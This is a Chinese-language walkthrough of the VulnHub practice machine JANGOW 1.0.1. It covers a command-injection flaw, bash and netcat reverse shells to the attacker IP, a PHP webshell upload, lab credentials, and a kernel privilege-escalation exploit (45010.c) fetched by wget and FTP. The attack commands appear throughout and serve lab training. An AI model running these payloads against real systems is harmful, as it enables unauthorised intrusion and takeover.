1-vulnhub靶场,JANGOW: 1.0.1

靶机地址:192.168.56.73
攻击机地址:192.168.56.129

namp搜集信息:
1-vulnhub靶场,JANGOW: 1.0.1_第1张图片
获取信息:21,80端口开放,linux系统。
访问80端口:
1-vulnhub靶场,JANGOW: 1.0.1_第2张图片
1-vulnhub靶场,JANGOW: 1.0.1_第3张图片
右上角的选项发现参数传递,最后发现存在命令执行漏洞。
1-vulnhub靶场,JANGOW: 1.0.1_第4张图片
尝试反弹shell:
攻击机192.168.56.129进行监听

nc -lvp 2345

命令执行漏洞执行任意一条:
bash反弹:

bash -i >/dev/tcp/192.168.56.129/2345 0>&1 2>&1

NC反弹:

nc -e /bin/bash 192.168.56.129 2345

1-vulnhub靶场,JANGOW: 1.0.1_第5张图片
发现反弹失败
尝试写入后门:

echo '' >> webshell.php

写入成功:
1-vulnhub靶场,JANGOW: 1.0.1_第6张图片
用蚁剑连接:
1-vulnhub靶场,JANGOW: 1.0.1_第7张图片
在俩目录下发现俩个账号密码:
1-vulnhub靶场,JANGOW: 1.0.1_第8张图片
1-vulnhub靶场,JANGOW: 1.0.1_第9张图片
账号/密码:desafio02/abygurl69,jangow01/abygurl69
尝试用俩账号连接ftp
jangow01显示连接成功
1-vulnhub靶场,JANGOW: 1.0.1_第10张图片
在site目录下新建反弹shell文件:

&1|nc 192.168.56.129 3345 >/tmp/f");?>

在这里插入图片描述
Kali进行监听并访问该文件,成功反弹shell
1-vulnhub靶场,JANGOW: 1.0.1_第11张图片
这里只可以利用443端口进行反弹。
切换交互式bash

python3 -c 'import pty;pty.spawn("/bin/bash")'

在这里插入图片描述
Su 切换用户
俩个尝试后只有01可以进去的
查看sudo命令
Sudo -l
1-vulnhub靶场,JANGOW: 1.0.1_第12张图片
查看系统内核
uname -a
在这里插入图片描述
查找是否存在漏洞:

searchsploit Ubantu 4.4.0-31

1-vulnhub靶场,JANGOW: 1.0.1_第13张图片
存在可利用漏洞,下载其中可利用exp
1-vulnhub靶场,JANGOW: 1.0.1_第14张图片
先编译好然后使用python搭建临时http服务器传过去

gcc 45010.c -o exp
python3 -m http.server 8000

1-vulnhub靶场,JANGOW: 1.0.1_第15张图片
然后靶机下载该exp

wget http://192.168.56.129:8000/exp 

1-vulnhub靶场,JANGOW: 1.0.1_第16张图片
下载不了
利用ftp传过去:
1-vulnhub靶场,JANGOW: 1.0.1_第17张图片
上传成功之后来到反弹shell成功的01账户
1-vulnhub靶场,JANGOW: 1.0.1_第18张图片
先找到exp位置
cd /home/jangow01
给exp给予执行的权限并执行
Chmod +x exp
./exp执行
1-vulnhub靶场,JANGOW: 1.0.1_第19张图片
完成。

你可能感兴趣的:(靶机-每日练习记录,php,bash,linux,安全)